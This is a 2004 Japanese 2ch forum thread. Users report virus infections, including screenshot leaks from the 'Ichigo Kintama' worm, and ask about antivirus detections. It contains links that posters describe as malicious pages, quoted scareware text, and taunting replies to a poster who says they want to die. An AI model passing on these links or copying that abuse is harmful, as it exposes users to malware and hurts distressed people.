まるで部屋の中に隠しカメラがあって、トイレからオナニーまで覗かれた気分だ。
何もかも割れてるし、知り合いが見てないことを祈るだけだ。
何回もアップされてたみたいだし、過去の2chの苺きんたまスレで
自分の画像がアップされてるのも見た。
さっきから何も手につかなくて、部屋の中うろうろしてる。
さっきまでお腹がすいていたはずなのに、そんなことどうでも良くなってる。
まるで部屋の中に隠しカメラがあって、トイレからオナニーまで覗かれた気分だ。
707 :名無しさん@お腹いっぱい。:04/09/27 01:45:45
,-――――――-.
/ |
/ |
/ |
l"ジェンキン寿司 l
,、_lー-―――――‐--、/l
i ト、ミミ ,r‐- 、``'ニ=‐、.彡リ.
ヾ,iハ゛.´ _,,、_ i.; _,. ` 彡'i)
`、j,' `゚''´:.ノ i::<・ゝ) .ハン >>702へいっ!!!がりおまちっ!!!
i, ` ,、/ i_ `` ,r' そろそろ巣に帰るぞ
,r〃'i ,r'ヽ、 _,〉 /.
/i:ト、;;i, ミ=_‐_-, 'i /ヽ__
r-‐'´i::::ハ;;ヾ、‐‐-、 ノ´/i:::'i`i‐- 、_
::i' .l:i 'i::::i ヾ;;`‐---‐'i':/ i、 'i::! i::::i `
:i' i:| !:::l _,r.、;;;;;,r''´ヽi. ll::i i::i l:::'i
/ |
/ |
/ |
l"ジェンキン寿司 l
,、_lー-―――――‐--、/l
i ト、ミミ ,r‐- 、``'ニ=‐、.彡リ.
ヾ,iハ゛.´ _,,、_ i.; _,. ` 彡'i)
`、j,' `゚''´:.ノ i::<・ゝ) .ハン >>702へいっ!!!がりおまちっ!!!
i, ` ,、/ i_ `` ,r' そろそろ巣に帰るぞ
,r〃'i ,r'ヽ、 _,〉 /.
/i:ト、;;i, ミ=_‐_-, 'i /ヽ__
r-‐'´i::::ハ;;ヾ、‐‐-、 ノ´/i:::'i`i‐- 、_
::i' .l:i 'i::::i ヾ;;`‐---‐'i':/ i、 'i::! i::::i `
:i' i:| !:::l _,r.、;;;;;,r''´ヽi. ll::i i::i l:::'i
708 :名無しさん@お腹いっぱい。:04/09/27 01:46:08
なんかネタ臭いな
709 :名無しさん@お腹いっぱい。:04/09/27 01:46:44
この調子で感染者の見てる先
いろんなところに爆撃されてます
いろんなところに爆撃されてます
710 :名無しさん@お腹いっぱい。:04/09/27 01:46:45
>>672
お前は本当にすべてを捨てれるんだろうな?
お前は本当にすべてを捨てれるんだろうな?
711 :名無しさん@お腹いっぱい。:04/09/27 01:46:48
吐きそう
713 :名無しさん@お腹いっぱい。:04/09/27 01:47:30
泣きそう
715 :名無しさん@お腹いっぱい。:04/09/27 01:48:31
嘘だったらどんなに嬉しいか。
変なexeファイルを開いた瞬間に気付くべきだった。
もう外にも出たくない。本当に死にたい。
変なexeファイルを開いた瞬間に気付くべきだった。
もう外にも出たくない。本当に死にたい。
717 :名無しさん@お腹いっぱい。:04/09/27 01:50:26
>>716
( ´_ゝ`)フーン
( ´_ゝ`)フーン
718 :名無しさん@お腹いっぱい。:04/09/27 01:50:45
>>716
下手に騒がなければ一時的なネタとして流れるから安心しる!
下手に騒がなければ一時的なネタとして流れるから安心しる!
719 :名無しさん@お腹いっぱい。:04/09/27 01:51:10
720 :名無しさん@お腹いっぱい。:04/09/27 01:52:00
721 :名無しさん@お腹いっぱい。:04/09/27 01:52:27
>>716
市ね
市ね
722 :名無しさん@お腹いっぱい。:04/09/27 01:52:28
>>716
変なexe開いた瞬間にPCがあぼーんしなくてよかったな
変なexe開いた瞬間にPCがあぼーんしなくてよかったな
723 :名無しさん@お腹いっぱい。:04/09/27 01:52:34
>>716
個人情報が流れてない限りは早く駆除しとけ
個人情報が流れてない限りは早く駆除しとけ
724 :名無しさん@お腹いっぱい。:04/09/27 01:52:40
とりあえずShellSystem.exe消して再起動しる
725 :名無しさん@お腹いっぱい。:04/09/27 01:53:28
726 :名無しさん@お腹いっぱい。:04/09/27 01:53:41
俺と会ってみろ。
お前を救えるかもしれない。
お前を救えるかもしれない。
727 :名無しさん@お腹いっぱい。:04/09/27 01:53:44
728 :名無しさん@お腹いっぱい。:04/09/27 01:53:50
>>716
自己責任だバカやろう
自己責任だバカやろう
729 :名無しさん@お腹いっぱい。:04/09/27 01:54:02
げ、もう3時かよ!
730 :名無しさん@お腹いっぱい。:04/09/27 01:54:25
てかこのスレ自演できるじゃねえか
732 :名無しさん@お腹いっぱい。:04/09/27 01:54:41
長くいてすいません。
でも、一人になると気が狂いそう。
でも、一人になると気が狂いそう。
735 :名無しさん@お腹いっぱい。:04/09/27 01:56:48
>>733
ぢゃ、気が狂ってください^^
ぢゃ、気が狂ってください^^
736 :名無しさん@お腹いっぱい。:04/09/27 01:56:57
>>731
ユーザー名くらいでしょ?無問題では?
ユーザー名くらいでしょ?無問題では?
737 :名無しさん@お腹いっぱい。:04/09/27 01:57:09
>>733
個人情報がどのレベルで漏れたか詳細きぼん
個人情報がどのレベルで漏れたか詳細きぼん
738 :名無しさん@お腹いっぱい。:04/09/27 01:57:51
739 :名無しさん@お腹いっぱい。:04/09/27 01:58:09
詳細書くと特定されるんじゃね?
740 :名無しさん@お腹いっぱい。:04/09/27 01:59:15
なら何も言わず黙ってるしかないな
住所さらされてるヤツよりマシだと思え
住所さらされてるヤツよりマシだと思え
741 :名無しさん@お腹いっぱい。:04/09/27 02:00:37
まさか創k(ry
742 :名無しさん@お腹いっぱい。:04/09/27 02:00:40
そもそも晒されたー
って言っておきながら回線切ってない時点で嘘決定。
回線切ったらネタを書き込めないもんな。
って言っておきながら回線切ってない時点で嘘決定。
回線切ったらネタを書き込めないもんな。
743 :名無しさん@お腹いっぱい。:04/09/27 02:00:43
>>726
坂田師匠キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
坂田師匠キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
744 :名無しさん@お腹いっぱい。:04/09/27 02:00:49
>>726
ガンツキタ━━━━━(゚∀゚)━━━━━!!!
ガンツキタ━━━━━(゚∀゚)━━━━━!!!
745 :名無しさん@お腹いっぱい。:04/09/27 02:01:37
>>665
家族写真と職業住所割れて電話でお知らせと比べてどう?
家族写真と職業住所割れて電話でお知らせと比べてどう?
746 :名無しさん@お腹いっぱい。:04/09/27 02:01:51
糞にまみれたーー
747 :名無しさん@お腹いっぱい。:04/09/27 02:02:00
>>734
レジストリを高速でスキャンするんだ!!
レジストリを高速でスキャンするんだ!!
748 :名無しさん@お腹いっぱい。:04/09/27 02:05:20
>>665
俺なんか躁うつ病だけど、躁のときに
自分の写真つきで住所・氏名・電話番号を
ネットのあらゆる所にバラまいて
しかも荒らしたり煽りまくって、webarchiveに今もあるだろうけど
バラまきすぎて対処できなくて諦めてるが生きてるぞ!
いまだにイタ電くるぞ!
キンタマなんか色んな奴がかかってる
すぐにおさまるし大丈夫だ!
俺なんか躁うつ病だけど、躁のときに
自分の写真つきで住所・氏名・電話番号を
ネットのあらゆる所にバラまいて
しかも荒らしたり煽りまくって、webarchiveに今もあるだろうけど
バラまきすぎて対処できなくて諦めてるが生きてるぞ!
いまだにイタ電くるぞ!
キンタマなんか色んな奴がかかってる
すぐにおさまるし大丈夫だ!
>>748
ありがとう。なんか涙でてきた。
ありがとう。なんか涙でてきた。
750 :名無しさん@お腹いっぱい。:04/09/27 02:08:47
>>749
がんがれ
がんがれ
今回何人くらいがかかってるんだろう
752 :名無しさん@お腹いっぱい。:04/09/27 02:12:52
知らせてくれた人に感謝するんだぞ。
どんな時でも感謝の気持ちを忘れちゃいけない。
どんな時でも感謝の気持ちを忘れちゃいけない。
753 :名無しさん@お腹いっぱい。:04/09/27 02:14:55
明日からは会社でロリファイル落としてたやつらのPC画像がUpされるだろうから
もっと悲惨だぞ
下手すると会社クビな上に個人情報晒しまくり
もっと悲惨だぞ
下手すると会社クビな上に個人情報晒しまくり
754 :名無しさん@お腹いっぱい。:04/09/27 02:16:28
ああ、もう24スレも先が見え始めてきたな。
相変わらず、こんなところに質問書き込んでまともに答えが出るの期待してる奴大杉だな。
相変わらず、こんなところに質問書き込んでまともに答えが出るの期待してる奴大杉だな。
755 :名無しさん@お腹いっぱい。:04/09/27 02:17:07
756 :名無しさん@お腹いっぱい。:04/09/27 02:19:49
exe 踏まなきゃ感染しないんでないの? FW で防げるとか
757 :名無しさん@お腹いっぱい。:04/09/27 02:20:40
私だって寝てないんだ!
758 :名無しさん@お腹いっぱい。:04/09/27 02:24:10
オマイラこのまま1000までいくつもりか?ええ?
759 :名無しさん@お腹いっぱい。:04/09/27 02:28:43
FWのことはよくわからないが
通常→シェリーとかいう.exeがネットワークにアクセスしようとしています
許可しますか? というのが出てくるはずで
そこで拒否すれば防げると思うのだが どうだろう
間違ってたら教えてくだされ
通常→シェリーとかいう.exeがネットワークにアクセスしようとしています
許可しますか? というのが出てくるはずで
そこで拒否すれば防げると思うのだが どうだろう
間違ってたら教えてくだされ
760 :名無しさん@お腹いっぱい。:04/09/27 02:37:18
761 :名無しさん@お腹いっぱい。:04/09/27 02:48:26
〜回目っていうのは、その分すべてがアップされてるのでしょうか?
それともそのうちの数回分だけ?
それともそのうちの数回分だけ?
762 :名無しさん@お腹いっぱい。:04/09/27 05:44:45
>>761
運による うまく送信できればアップされる
運による うまく送信できればアップされる
763 :名無しさん@お腹いっぱい。:04/09/27 05:46:46
失礼します。
ファイル名を指定して実行でregeditと入れると
メモ帳が開くんですが、これは金玉に感染しているということですよね…?
ファイル名を指定して実行でregeditと入れると
メモ帳が開くんですが、これは金玉に感染しているということですよね…?
764 :名無しさん@お腹いっぱい。:04/09/27 05:49:49
ご愁傷様
765 :名無しさん@お腹いっぱい。:04/09/27 07:00:59
2chの某スレのリンクを踏んだらパソコン(ウィンドウズ98)の具合が悪くなりました
・インターネットエクスプローラーが開かない
・突然インターネットエクスプローラが開き、エロサイトにつながる
・でも他のページにはいけない
・パソコンから定期的に「ギギガガ・・」という音がしてなにか読み取られてるのか
あるいは書き込んでいるのかとても不安
ノートンのライブアップデートを行って調べてみたら
Trojan.Adclicker に感染してると結果がでました
削除してねとお願いしたら、ノートンさんは削除できませんでしたと言います
ノートンさんのおかげで感染ファイルはわかっているので
手動で削除しようとしたら、このファイルはウィンドウズが使っているので削除できませんと表示されます
どうすれば治すことができるのか、わかる方ご指導お願いします
・インターネットエクスプローラーが開かない
・突然インターネットエクスプローラが開き、エロサイトにつながる
・でも他のページにはいけない
・パソコンから定期的に「ギギガガ・・」という音がしてなにか読み取られてるのか
あるいは書き込んでいるのかとても不安
ノートンのライブアップデートを行って調べてみたら
Trojan.Adclicker に感染してると結果がでました
削除してねとお願いしたら、ノートンさんは削除できませんでしたと言います
ノートンさんのおかげで感染ファイルはわかっているので
手動で削除しようとしたら、このファイルはウィンドウズが使っているので削除できませんと表示されます
どうすれば治すことができるのか、わかる方ご指導お願いします
766 :名無しさん@お腹いっぱい。:04/09/27 09:38:00
767 :名無しさん@お腹いっぱい。:04/09/27 09:38:03
>>765
再インストール
再インストール
768 :765:04/09/27 16:09:02
ご指導ありがとうございます
セーフモードでは起動できませんでした
何度やっても途中でフリーズしてしまいます
仕方ないので、リカバリーCDをかけてみようと思います
セーフモードでは起動できませんでした
何度やっても途中でフリーズしてしまいます
仕方ないので、リカバリーCDをかけてみようと思います
769 :名無しさん@お腹いっぱい。:04/09/27 16:40:12
教えてくれよ〜
IE開くと「表示出来ないページ」というのが延々とでてくるんだよ
なんなんでしょ???
IE開くと「表示出来ないページ」というのが延々とでてくるんだよ
なんなんでしょ???
770 :名無しさん@お腹いっぱい。:04/09/27 16:58:37
771 :Yahoo!メールやばくない?:04/09/27 17:02:21
ここ数日の間に
12608@ t.vodafone.ne.jp
noreply@daitinoaka
webmaster@ wakuwaku21.com
[email protected]
の四つのメールアドレスからウイルスの入った添付ファイルが送られて来ました
本文が英語で書いてあり、連絡事項のような内容です
注意してください
12608@ t.vodafone.ne.jp
noreply@daitinoaka
webmaster@ wakuwaku21.com
[email protected]
の四つのメールアドレスからウイルスの入った添付ファイルが送られて来ました
本文が英語で書いてあり、連絡事項のような内容です
注意してください
772 :名無しさん@お腹いっぱい。:04/09/27 17:13:05
pc内のmp3データがどんどん侵食されて再生不能になっていくんですがウイルスなんでしょうか?
773 :名無しさん@お腹いっぱい。:04/09/27 17:44:16
わっがんね
774 :名無しさん@お腹いっぱい。:04/09/27 17:51:23
>>772
nyやめて、回線切って隠居しろ
nyやめて、回線切って隠居しろ
775 :772:04/09/27 17:56:39
776 :名無しさん@お腹いっぱい。:04/09/27 18:51:07
職人さんによる今回の「苺きんたま」ウィルス騒動のまとめフラッシュ
http://douch.net/cgi-bin1/src/up0281.swf
http://douch.net/cgi-bin1/src/up0281.swf
777 :名無しさん@お腹いっぱい。:04/09/27 18:53:16
778 :名無しさん@お腹いっぱい。:04/09/27 19:07:26
_,、、、、、、、,_ n
,riTl|l.il|..ll..|ll.i..lli、 y
ril l!|.|l|.l||!.l|.|l|lil.l|l|l 回 や
||l!i!|州l|l|ll||lllミillll|l| 線 め
!|||ラ''' '´!|ll||l!lソ|||l|| 切 て
隠 `t'_,,,ヽ i´l州 っ
居 ゙iー '' /i',ノ'゙入 て
し `ー'、´ /,r'´ ,>、
ろ ,イy' / /,r ヽ,
,r'// / /,i' ' i ゙、
/,/li,/ ,/,i',i' ,r ,r7' ヽ,i.
〃,//l/ .// ,' /'´ / ハ.
/,' / l./ ,i'i l// / / l
/ ,i ,i ,!/ ,i' l // ,/ ,/ l.
,/ l l i l./ !i .l / _,/ / l!
,r'=‐、_ll_!j'_,_、-‐、‐' __,,. !l.
/ノ /´/ ``ヽ、 ` ``''''"´ ,! l
/´ ,/-/ `` ``ヽ、、___,, i l
/ ,.イl / ,.r‐ ``ヽ、,__ ,! ./!l
/ jly' - '´ i i !.|
〈_/'V |l `'‐‐‐‐‐‐‐‐‐‐‐‐_,,,、、-‐‐'' ! |
} ,/ l!',>、 ___,,,、、-―''´―-、、‐' ! |
レ'/ / i/l! い、_``ヽ、、______, _,,ノ
〉',/l j/:l!:l ヽ ゙、__ ̄ ̄____,/ `'ー‐'ン'l.l
,riTl|l.il|..ll..|ll.i..lli、 y
ril l!|.|l|.l||!.l|.|l|lil.l|l|l 回 や
||l!i!|州l|l|ll||lllミillll|l| 線 め
!|||ラ''' '´!|ll||l!lソ|||l|| 切 て
隠 `t'_,,,ヽ i´l州 っ
居 ゙iー '' /i',ノ'゙入 て
し `ー'、´ /,r'´ ,>、
ろ ,イy' / /,r ヽ,
,r'// / /,i' ' i ゙、
/,/li,/ ,/,i',i' ,r ,r7' ヽ,i.
〃,//l/ .// ,' /'´ / ハ.
/,' / l./ ,i'i l// / / l
/ ,i ,i ,!/ ,i' l // ,/ ,/ l.
,/ l l i l./ !i .l / _,/ / l!
,r'=‐、_ll_!j'_,_、-‐、‐' __,,. !l.
/ノ /´/ ``ヽ、 ` ``''''"´ ,! l
/´ ,/-/ `` ``ヽ、、___,, i l
/ ,.イl / ,.r‐ ``ヽ、,__ ,! ./!l
/ jly' - '´ i i !.|
〈_/'V |l `'‐‐‐‐‐‐‐‐‐‐‐‐_,,,、、-‐‐'' ! |
} ,/ l!',>、 ___,,,、、-―''´―-、、‐' ! |
レ'/ / i/l! い、_``ヽ、、______, _,,ノ
〉',/l j/:l!:l ヽ ゙、__ ̄ ̄____,/ `'ー‐'ン'l.l
779 :名無しさん@お腹いっぱい。:04/09/27 19:09:21
//www.cty-net.ne.jp/~taitiro/imgboard/data/img20040825044524.jpg
これもブラクラですが、踏んでしまったらどうしたらいいですか・・・?
これもブラクラですが、踏んでしまったらどうしたらいいですか・・・?
780 :779:04/09/27 19:13:59
↑ブラクラじゃねぇ!ウィルスのサイトだった。どうしたらいいですか?
781 :名無しさん@お腹いっぱい。:04/09/27 19:14:12
>>779
, -―- 、
/ \
/ /| /| ハ ヽ_
/ / / / // | | | ヽ / /
/ _/ / / |/ |/ v N | | |/ /| / ̄ ̄ ̄ ̄
| ./ / |/TΤ ГTヽ|( (/))| < マルチ
|/レ | 〉 -┘ 、 └- V ~ | | \____
v\ ″ ー ″ イv w N
^ ` ー- ノ ヽ
| | | / / ∧
, -―- 、
/ \
/ /| /| ハ ヽ_
/ / / / // | | | ヽ / /
/ _/ / / |/ |/ v N | | |/ /| / ̄ ̄ ̄ ̄
| ./ / |/TΤ ГTヽ|( (/))| < マルチ
|/レ | 〉 -┘ 、 └- V ~ | | \____
v\ ″ ー ″ イv w N
^ ` ー- ノ ヽ
| | | / / ∧
782 :名無しさん@お腹いっぱい。:04/09/27 19:19:10
苺きんたまに感染したらCPU使用率って常に100%なんですか?
CPU使用率が10%前後だったら感染してないって思って大丈夫?
CPU使用率が10%前後だったら感染してないって思って大丈夫?
783 :名無しさん@お腹いっぱい。:04/09/27 19:22:24
784 :名無しさん@お腹いっぱい。:04/09/27 19:36:53
785 :名無しさん@お腹いっぱい。:04/09/27 19:39:59
>771
今頃何をほざいてお出でですかw
今頃何をほざいてお出でですかw
786 :名無しさん@お腹いっぱい。:04/09/27 21:09:20
788 :名無しさん@お腹いっぱい。:04/09/27 21:29:02
「安全なInternet Explorer」はWindows XP SP2にのみ提供される
http://japan.cnet.com/news/ent/story/0,2000047623,20074797,00.htm
http://japan.cnet.com/news/ent/story/0,2000047623,20074797,00.htm
789 :名無しさん@お腹いっぱい。:04/09/27 21:29:12
>786
>779の中身はHTMLなので違うと思われ
>779の中身はHTMLなので違うと思われ
790 :名無しさん@お腹いっぱい。:04/09/27 21:59:29
>>787
マルチに答えるな、クソぼる
マルチに答えるな、クソぼる
>>790
うるせえカス。まともな回答もできんクセに。
うるせえカス。まともな回答もできんクセに。
792 :名無しさん@お腹いっぱい。:04/09/27 22:03:47
W32.Randex.genというウィルスをノートン先生が見つけたんですが、
検疫できなかったのでノートン先生の画面に「自動的に削除をお勧めします」
と出てるんですが、感染してるファイルがよりによってmsconfig
これ本当に削除していいんですか・・・?
ちなみにwinfix3というファイルは見つかってません。誤診でしょうか?
検疫できなかったのでノートン先生の画面に「自動的に削除をお勧めします」
と出てるんですが、感染してるファイルがよりによってmsconfig
これ本当に削除していいんですか・・・?
ちなみにwinfix3というファイルは見つかってません。誤診でしょうか?
793 :名無しさん@お腹いっぱい。:04/09/27 22:03:57
>>791
甘やかすなハゲ
甘やかすなハゲ
>>793
ほれ。質問来たぞ。まともな回答しろや
ほれ。質問来たぞ。まともな回答しろや
795 :名無しさん@お腹いっぱい。:04/09/27 22:09:43
796 :名無しさん@お腹いっぱい。:04/09/27 22:11:05
>>794
ヒッキーの仕事を取ったら悪いのでやめとく。ほれ、仕事しろ。
ヒッキーの仕事を取ったら悪いのでやめとく。ほれ、仕事しろ。
797 :名無しさん@お腹いっぱい。:04/09/27 22:14:09
798 :名無しさん@お腹いっぱい。:04/09/27 22:19:02
799 :名無しさん@お腹いっぱい。:04/09/28 06:43:40
ノートン先生が捨てろと言ってるんだから素直に捨てろ!全部捨てろ。
800 :名無しさん@お腹いっぱい。:04/09/28 18:23:15
Alt+Ctrl+Deleteが効かないのですが、何かウィルスですか?
801 :名無しさん@お腹いっぱい。:04/09/28 18:28:26
それが・・・何故か削除できなかったぽ
システムの復元もオフにしてるのになあ
システムの復元もオフにしてるのになあ
803 :名無しさん@お腹いっぱい。:04/09/28 20:35:55
>802
おまいも>86にのっとって環境書いてくれ
おまいも>86にのっとって環境書いてくれ
804 :名無しさん@お腹いっぱい。:04/09/28 20:46:13
805 :名無しさん@お腹いっぱい。:04/09/28 23:04:36
一週間ほど前から
ノートンファイヤーウォールが
「リモートホストがコンピュータにアクセスしようとしています」という警告が出ます。
リモートアドレスとローカルアドレスが毎回違うので
「常にこの処理を使う」にチェックを入れても効果がありません。
ノートンのビジュアルトラッキングでは
一番最後のドメイン情報は 222.121.184.11と出ていますが
これってウィルス?
ノートンファイヤーウォールが
「リモートホストがコンピュータにアクセスしようとしています」という警告が出ます。
リモートアドレスとローカルアドレスが毎回違うので
「常にこの処理を使う」にチェックを入れても効果がありません。
ノートンのビジュアルトラッキングでは
一番最後のドメイン情報は 222.121.184.11と出ていますが
これってウィルス?
806 :名無しさん@お腹いっぱい。:04/09/28 23:13:06
バスターのオンラインスキャンで TROJ_DIALER.N を検出したんですが
バスターに情報は無く、ググっても見当たらないので、ご存知の方いましたら情報お願いします。
バスターに情報は無く、ググっても見当たらないので、ご存知の方いましたら情報お願いします。
807 :名無しさん@お腹いっぱい。:04/09/29 00:14:35
なぜか急にいろんなフォルダにdesktop.iniが出来たんですが、
これは何かのウイルスによるものなんですか?
これは何かのウイルスによるものなんですか?
808 :名無しさん@お腹いっぱい。:04/09/29 00:15:08
809 :名無しさん@お腹いっぱい。:04/09/29 01:50:01
>>807
マルチ
マルチ
810 :名無しさん@お腹いっぱい。:04/09/29 02:05:34
windows起動時にmoleboxというPOPウィンドウが開くのですが・・・
何かウィルスに感染したのでしょうか?
ノートンは反応なしです。
何かウィルスに感染したのでしょうか?
ノートンは反応なしです。
811 :名無しさん@お腹いっぱい。:04/09/29 02:16:17
ノートン一昨日定義でダクロリ踏んだらウイルスメールがたくさんきました。
みなさんも気をつけて…
みなさんも気をつけて…
812 :名無しさん@お腹いっぱい。:04/09/29 05:09:10
最近質問の仕方がひどいな
813 :名無しさん@お腹いっぱい。:04/09/29 06:30:55
>812
禿同。慌ててここに書き込むより状況を整理してからでしょ。順序は大事。
禿同。慌ててここに書き込むより状況を整理してからでしょ。順序は大事。
814 :名無しさん@お腹いっぱい。:04/09/29 09:55:48
>>812
他のスレもそうだが、わざとやってるとしか思えん。
他のスレもそうだが、わざとやってるとしか思えん。
815 :名無しさん@お腹いっぱい。:04/09/29 10:59:34
ttp://www2.strangeworld.org/uedakana/sahra6138.jpg
さっきこれ踏んだらメール作成画面が死ぬほどでてきて
フリーズしたんで強制終了したんですが
何かウィルスが入ってるんでしょうか
今の所パソコンに異常はありません
もしウィルスがあるのであれば
どういった症状になるのかも教えてください
よろしくお願いします
さっきこれ踏んだらメール作成画面が死ぬほどでてきて
フリーズしたんで強制終了したんですが
何かウィルスが入ってるんでしょうか
今の所パソコンに異常はありません
もしウィルスがあるのであれば
どういった症状になるのかも教えてください
よろしくお願いします
816 :名無しさん@お腹いっぱい。:04/09/29 11:03:31
わざとでしょ
817 :名無しさん@お腹いっぱい。:04/09/29 11:05:44
818 :名無しさん@お腹いっぱい。:04/09/29 11:52:42
なんか Tウイルス に感染したっぽいんだけど・・・
友達なんて共食いしてるし
友達なんて共食いしてるし
819 :名無しさん@お腹いっぱい。:04/09/29 11:57:48
解決しました、一応報告までに。
みなさんありがとうございます。
みなさんありがとうございます。
821 :名無しさん@お腹いっぱい。:04/09/29 16:48:24
822 :名無しさん@お腹いっぱい。:04/09/29 17:16:03
質問させてください。
今日、ノートンが「VBS.loveletter.var」を検出しました。
うちのノートンは更新してないのでトレンドマイクロのオンラインスキャンでスキャンしたところ
感染ファイルは見つかりませんでした。(スキャンの間ノートンは警告出しまくりでしたが。)
それで私はノートンが誤反応起こしてるのではないかと思い、
インターネットオプション→一時ファイルの削除、履歴の削除を行いました。
再び、スキャンしてみたところ、ノートンは警告を出しませんでした。
これって結局ウィルスじゃなくてノートンを誤反応起こさせるいたずらですよね?
今日、ノートンが「VBS.loveletter.var」を検出しました。
うちのノートンは更新してないのでトレンドマイクロのオンラインスキャンでスキャンしたところ
感染ファイルは見つかりませんでした。(スキャンの間ノートンは警告出しまくりでしたが。)
それで私はノートンが誤反応起こしてるのではないかと思い、
インターネットオプション→一時ファイルの削除、履歴の削除を行いました。
再び、スキャンしてみたところ、ノートンは警告を出しませんでした。
これって結局ウィルスじゃなくてノートンを誤反応起こさせるいたずらですよね?
823 :名無しさん@お腹いっぱい。:04/09/29 17:33:42
824 :名無しさん@お腹いっぱい。:04/09/29 17:52:21
825 :名無しさん@お腹いっぱい。:04/09/29 18:21:24
>>824
こちらも見たほうがいいかな。多分そこもやられてるんで、誤反応するかも
ノートンがvbsウィルスのソースに誤反応2
http://pc6.2ch.net/test/read.cgi/pcqa/1033948204/l50
こちらも見たほうがいいかな。多分そこもやられてるんで、誤反応するかも
ノートンがvbsウィルスのソースに誤反応2
http://pc6.2ch.net/test/read.cgi/pcqa/1033948204/l50
826 :名無しさん@お腹いっぱい。:04/09/29 19:07:00
>820
治って良かったね。
治って良かったね。
827 :名無しさん@お腹いっぱい。:04/09/29 19:38:44
ウイルスでTROJ_VB.JLってのに感染してるみたいなんですが
ウイルスバスターの最新版で検索したら感染ファイルは見つかりません
でしたってでるんですけど
ウイルスログを見ると隔離できません削除できませんってなってるんですけど
これって感染してるんですか?
ウイルスバスターの最新版で検索したら感染ファイルは見つかりません
でしたってでるんですけど
ウイルスログを見ると隔離できません削除できませんってなってるんですけど
これって感染してるんですか?
828 :名無しさん@お腹いっぱい。:04/09/29 19:50:01
830 :名無しさん@お腹いっぱい。:04/09/29 21:36:26
ttp://default-homepage-network.com/start.cgi?hkcu
を、ある理由で興奮&焦ってたんで、周りの反応をうかがわずについ・・・
なにやら怪しげなページにとんで、怪しげなウインドウが開き、
妙なアニメキャラ泣き声にありそうな効果音の後に、CDが勝手に開いたり・・・
深夜徹夜でもうろうとした中焦って電源切っちゃったり・・・
感染したんでしょうか?
を、ある理由で興奮&焦ってたんで、周りの反応をうかがわずについ・・・
なにやら怪しげなページにとんで、怪しげなウインドウが開き、
妙なアニメキャラ泣き声にありそうな効果音の後に、CDが勝手に開いたり・・・
深夜徹夜でもうろうとした中焦って電源切っちゃったり・・・
感染したんでしょうか?
わざとではなかったんです、すいません。。。
molebox launcherというのが起動時に表示されるようになった同時期に
ノートンアンチウィルス2004がウィルス名W32.Spybot.Wormを検出しました
でもノートンでは最新のウィルス定義でも削除できなかったため
自分なりに調べて似たような症状のことがカキコしてあるスレを見つけ(下記参)
ttp://www.google.co.jp/search?q=cache:KvwSARYNxVQJ:etc.2ch.net/test/read.cgi/qa/1070828680/51-150+molebox+launcher&hl=ja&lr=lang_ja
を参考にレジストリを削除しようとしたのですが
"Winsock32driver"="win32server.scr"という名前のものも似たような名前のものも見当たらず
セーフモードでウィルスとされているファイル(srss.exe)を削除しました
そのあとノートンでスキャンしたところウィルスは感知されなかったため
安心して再起動したとこと、またmolebox launcherが・・・
ノートンで感知してたウィルスとはまた違うものなのか?と思い
助けを求めたのが>810のカキコです。。。
今日、仕事から帰ってきてPCを見たところ昨日削除したと思われたウィルスと
同じ名前のウィルスが違う場所それも数箇所に拡散してました。。。
PC初心者の私ではもうどうしたらいいのかわかりません・・・
molebox launcherというのが起動時に表示されるようになった同時期に
ノートンアンチウィルス2004がウィルス名W32.Spybot.Wormを検出しました
でもノートンでは最新のウィルス定義でも削除できなかったため
自分なりに調べて似たような症状のことがカキコしてあるスレを見つけ(下記参)
ttp://www.google.co.jp/search?q=cache:KvwSARYNxVQJ:etc.2ch.net/test/read.cgi/qa/1070828680/51-150+molebox+launcher&hl=ja&lr=lang_ja
を参考にレジストリを削除しようとしたのですが
"Winsock32driver"="win32server.scr"という名前のものも似たような名前のものも見当たらず
セーフモードでウィルスとされているファイル(srss.exe)を削除しました
そのあとノートンでスキャンしたところウィルスは感知されなかったため
安心して再起動したとこと、またmolebox launcherが・・・
ノートンで感知してたウィルスとはまた違うものなのか?と思い
助けを求めたのが>810のカキコです。。。
今日、仕事から帰ってきてPCを見たところ昨日削除したと思われたウィルスと
同じ名前のウィルスが違う場所それも数箇所に拡散してました。。。
PC初心者の私ではもうどうしたらいいのかわかりません・・・
832 :名無しさん@お腹いっぱい。:04/09/29 21:45:25
>>830
「ブラクラ&ウイルス」らすい。
要ウイルスチェック
他にも症状があるならコッチへ
エロサイト見たら…助けて下さい!Part41
http://pc6.2ch.net/test/read.cgi/pcqa/1095834281/l50
テンプレよく読んで、指示を実行すること。
「ブラクラ&ウイルス」らすい。
要ウイルスチェック
他にも症状があるならコッチへ
エロサイト見たら…助けて下さい!Part41
http://pc6.2ch.net/test/read.cgi/pcqa/1095834281/l50
テンプレよく読んで、指示を実行すること。
833 :名無しさん@お腹いっぱい。:04/09/29 21:57:28
>>830
スクリプト実行オフの時は、なんともなかった。
オンの時はDOS窓風の窓が表示されて、
「CDドライブが開いてたら、ウチのスパイウェア検出ソフトを使ってよ」
と宣伝っぽいことが書かれてた。
以下メインの窓に書かれてたこと
IMPORTANT SECURITY NOTICE FROM SPY DELETER!
Is your computer suffering from any of the following symptoms:
1. Has your browser's START PAGE changed?
or 2. Are you seeing a recent increase in annoying POP UPS?
or 3. Have PORN ads appeared in your browser or email?
or 4. Has your computer been acting wierd lately?
or 5. Is your Internet slower or even crashing?
or 6. Do you think your computer may have a virus?
or 7. Have new programs or toolbars been added without your permission?
If your computer is experiencing any of these symptoms...
It is almost certain that "spyware" has taken over your computer,
and the problems will only get worse quickly. Plus your sensitive
information like credit cards and all of your passwords can be
retrieved by criminals all around the world. This is a very scary
problem that needs immediate attention! You NEED to get this fixed now!
Click on THIS LINK FOR IMMEDIATE HELP and your computer will be
back to normal and secure again in just a few minutes.
スクリプト実行オフの時は、なんともなかった。
オンの時はDOS窓風の窓が表示されて、
「CDドライブが開いてたら、ウチのスパイウェア検出ソフトを使ってよ」
と宣伝っぽいことが書かれてた。
以下メインの窓に書かれてたこと
IMPORTANT SECURITY NOTICE FROM SPY DELETER!
Is your computer suffering from any of the following symptoms:
1. Has your browser's START PAGE changed?
or 2. Are you seeing a recent increase in annoying POP UPS?
or 3. Have PORN ads appeared in your browser or email?
or 4. Has your computer been acting wierd lately?
or 5. Is your Internet slower or even crashing?
or 6. Do you think your computer may have a virus?
or 7. Have new programs or toolbars been added without your permission?
If your computer is experiencing any of these symptoms...
It is almost certain that "spyware" has taken over your computer,
and the problems will only get worse quickly. Plus your sensitive
information like credit cards and all of your passwords can be
